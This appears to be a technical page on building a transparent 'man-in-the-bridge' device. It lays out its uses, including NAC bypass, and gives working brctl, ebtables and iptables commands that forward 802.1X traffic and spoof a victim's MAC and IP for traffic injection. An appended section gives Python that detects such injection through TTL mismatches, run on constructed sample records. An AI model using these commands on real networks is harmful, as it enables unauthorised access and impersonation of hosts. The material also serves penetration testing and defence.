Use Case | Description |
---|---|
Incident Response | Capturing traffic between an infected computer and a command and control computer |
Network Inspection / Injection | Allows traffic to be captured and injected |
Penetration Testing | Stealthy way of accessing the network and also a way of providing assurance by connecting the pentest laptop to the MIBR inject port and capturing all traffic on the MIBR. Any discussion about what did or did not take place can be easily verified. It also has the advantage of not requiring any additional switch ports to be configured, as you use an existing one |
NAC Bypass | Many enterprises implement NAC (Network Admission Control), which prevents unauthorised devices from being connected. Using the MIBR, the victim computer provides the authentication, which is forwarded to the switch port |
Type | NICs | Pros | Cons | Memory (MB) | Price (Approx) | OS |
---|---|---|---|---|---|---|
Laptop + USB Network Adapter | 2 | Relatively cheap and easy | Size, throughput limited by USB | 2048-32768 GB | 40 Eur | Any |
Soekris 4801 | 3 | Small Form Factor, possible wireless extension | Throughput limited by CPU, low memory | 256 | 120 Eur | voyage |
Soekris 6501 | 4 | Small Form Factor, possible wireless extension | Throughput limited by USB speeds | 512-2048 | 180 Eur | Any |
PCengines APU2 | 3 | Small Form Factor, built-in GSM, possible wireless extension |   | 4096 | 182 Eur | Any |
Raspberry PI 3-B + USB Network Adapter | 1 | Small Form Factor, Cheap | Speed limited by USB | 1024 | 45 Eur | Any |
Raspberry PI Zero + 2x USB Network Adapter and USB Hub | 1 | Small Form Factor, Cheap | Speed limited by USB, messy with all the connectors, prefer 3-B | 512 | 5 Eur | Any |
Interface | Role |
---|---|
eth0 | Connected to Switch |
eth1 | Connected to Victim device |
eth2 | Connect your laptop here (use IP 192.168.0.2/24) |
Tool | Purpose |
---|---|
brctl | Bridge tools |
iptables | Provides IP firewalling |
ebtables | Provides L2 (bridge) firewalling |
Command | Description |
---|---|
bridge.sh | Shows all options |
bridge.sh start | Configure all interfaces and set bridge mode |
bridge.sh stop | Stop the bridge |
bridge.sh restart | Perform a stop/start |
bridge.sh status | Show the status of the bridge |
bridge.sh setspoof | Add an inject interface and configure IP and NAT using CIFS info from victim captured on TCP/445 |
bridge.sh setspoofdhcp | Add an inject interface and configure IP and NAT using DHCP info from victim (disconnect victim link to force) |
```sh
ifconfig eth0 0.0.0.0                        # Remove any IP address
ifconfig eth0 down                           # Take interface down
ifconfig eth0 hw ether de:ad:be:ef:d4:ad     # Force MAC address
ifconfig eth1 0.0.0.0
ifconfig eth1 down
ifconfig eth1 hw ether de:ad:be:ef:d4:ae
ifconfig eth2 0.0.0.0
ifconfig eth2 down
ifconfig eth2 hw ether de:ad:be:ef:d4:af
ifconfig eth2 192.168.0.1 netmask 255.255.255.0   # Inject/management interface for the laptop
brctl delbr mibr                             # Delete any existing bridge
brctl addbr mibr                             # Create a new bridge interface
brctl addif mibr eth0                        # Add eth0 (connected to victim computer)
brctl addif mibr eth1                        # Add eth1 (connected to switch)
ifconfig eth0 up                             # Bridge ports must be up to forward
ifconfig eth1 up
brctl stp mibr off                           # Turn off Spanning Tree on the bridge
# Set bridge to pass all L2 traffic (such as 802.1x); this makes it non 802.1D compliant.
# The value used here depends on the kernel version: 8 works on most, but patched versions support 49144
# (the second write simply overrides the first on kernels that accept it).
echo 8 > /sys/class/net/mibr/bridge/group_fwd_mask
echo 49144 > /sys/class/net/mibr/bridge/group_fwd_mask
# Ignore IPv6 Router Advertisements on the bridge
echo 0 > /proc/sys/net/ipv6/conf/mibr/accept_ra
#arptables -A OUTPUT -o eth1 -j DROP        # Make sure that ARP traffic is dropped from the attacker
ifconfig mibr up                             # Bring up bridge interface (takes about 30-60 secs for the interface to settle)
```
With this configuration the bridge now transparently passes L2 (and higher-layer) traffic between the switch and the victim.
The next step is to configure the bridge to allow traffic injection by setting up L2 address translation (ebtables) and NAT (iptables) for the attacker's traffic.
The prerequisite for this is to determine the victim's IP and MAC address and to find an unused IP address on the victim network; these can easily be found by using tcpdump/tshark on the victim interface (eth0). The logic for this is encapsulated in the setspoof and setspoofdhcp commands supported by bridge.sh.
```sh
SWINT=eth1                     # Switch side interface
SWMAC=de:ad:be:ef:d4:ae        # Switch side MAC address (must match the MAC forced on eth1 above)
COMPMAC=xx:xx:xx:xx:xx:xx      # Victim MAC address
COMIP=yyy.yyy.yyy.yyy          # Victim IP address
BRINT=mibr                     # Bridge interface
BRIP4=yyy.yyy.yyy.yyy-2        # An unused IP address on the victim network
RANGE4=60000-61000             # Range of ports to use
# L2 NAT: rewrite the source MAC of frames leaving towards the switch to the victim's MAC
ebtables -t nat -A POSTROUTING -s ${SWMAC} -o ${SWINT} -j snat --to-src ${COMPMAC}
# IPv4 NAT: rewrite the source IP of injected TCP traffic to the victim's IP, restricted to the port range
iptables -t nat -A POSTROUTING -s ${BRIP4} -o ${BRINT} -p tcp -j SNAT --to ${COMIP}:${RANGE4}
# IPv6 NAT (remove if no IPv6)
COMIP6=                        # Victim IPv6 address
BRIP6=                         # An unused IPv6 address on the victim network
RANGE6=58000-59999             # Range of ports to use (a port range requires -p tcp or -p udp)
ip6tables -t nat -A POSTROUTING -s ${BRIP6} -o ${BRINT} -p tcp -j SNAT --to-source [${COMIP6}]:${RANGE6}
```
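A defender-side counterpart to the injection setup above, added here as an example that is not part of the original page or of the bridge.sh tool: the ebtables and iptables rules rewrite the source MAC and IP of injected packets to the victim's, but they leave the IP TTL alone, so packets generated on the bridge carry its own initial TTL (64 on Linux) while a Windows victim sends 128. A sensor on the switch port therefore sees one MAC/IP pair with two different inferred initial TTLs, and the injected share clusters in the narrow SNAT port range. The Python below applies that heuristic to constructed flow records; the MACs, IPs, port numbers and the Windows-victim/Linux-bridge TTL assumption are all illustrative.

```python
from collections import defaultdict

# Common initial TTL values used by operating-system IP stacks.
INITIAL_TTLS = (32, 64, 128, 255)

# Constructed sample records for this example, not a real capture:
# (src_mac, src_ip, observed_ttl, tcp_src_port) as a sensor on the switch
# port would see them.  The bridge's NAT leaves the victim's MAC and IP on
# injected packets but does not touch the TTL, so injected traffic keeps the
# bridge OS's own initial TTL (assumed Linux: 64) while the assumed Windows
# victim sends 128.
SAMPLE_RECORDS = [
    ("00:11:22:33:44:55", "10.1.2.50", 128, 49800),  # victim's own traffic
    ("00:11:22:33:44:55", "10.1.2.50", 128, 49801),
    ("00:11:22:33:44:55", "10.1.2.50", 64, 60010),   # injected through the bridge
    ("00:11:22:33:44:55", "10.1.2.50", 64, 60011),
    ("66:77:88:99:aa:bb", "10.1.2.51", 128, 50000),  # clean Windows host
    ("cc:dd:ee:ff:00:11", "10.1.2.60", 64, 40000),   # clean Linux host
]


def infer_initial_ttl(ttl):
    """Map an observed TTL to the smallest common initial value not below it."""
    for candidate in INITIAL_TTLS:
        if ttl <= candidate:
            return candidate
    return INITIAL_TTLS[-1]


def find_ttl_inconsistencies(records):
    """Return {(mac, ip): [initial TTLs]} for every source seen with more than
    one inferred initial TTL.  A single host normally has exactly one."""
    seen = defaultdict(set)
    for mac, ip, ttl, _port in records:
        seen[(mac.lower(), ip)].add(infer_initial_ttl(ttl))
    return {key: sorted(ttls) for key, ttls in seen.items() if len(ttls) > 1}


def port_ranges_by_ttl(records, mac, ip):
    """For one source, the (min, max) TCP source port seen per initial TTL.
    Traffic that went through a SNAT rule with a port range shows up as a
    tight cluster, which separates it from the host's own ephemeral ports."""
    ports = defaultdict(list)
    for r_mac, r_ip, ttl, port in records:
        if r_mac.lower() == mac.lower() and r_ip == ip:
            ports[infer_initial_ttl(ttl)].append(port)
    return {ttl: (min(p), max(p)) for ttl, p in ports.items()}


if __name__ == "__main__":
    for (mac, ip), ttls in find_ttl_inconsistencies(SAMPLE_RECORDS).items():
        print(f"{ip} ({mac}) seen with initial TTLs {ttls}:",
              port_ranges_by_ttl(SAMPLE_RECORDS, mac, ip))
```

The TTL check is the robust part: it needs no knowledge of the attacker's configuration, only that the bridge OS and the victim OS differ in their default initial TTL. The port-range view is supporting evidence and only becomes sharp when the injected side really uses a SNAT port range like RANGE4 above.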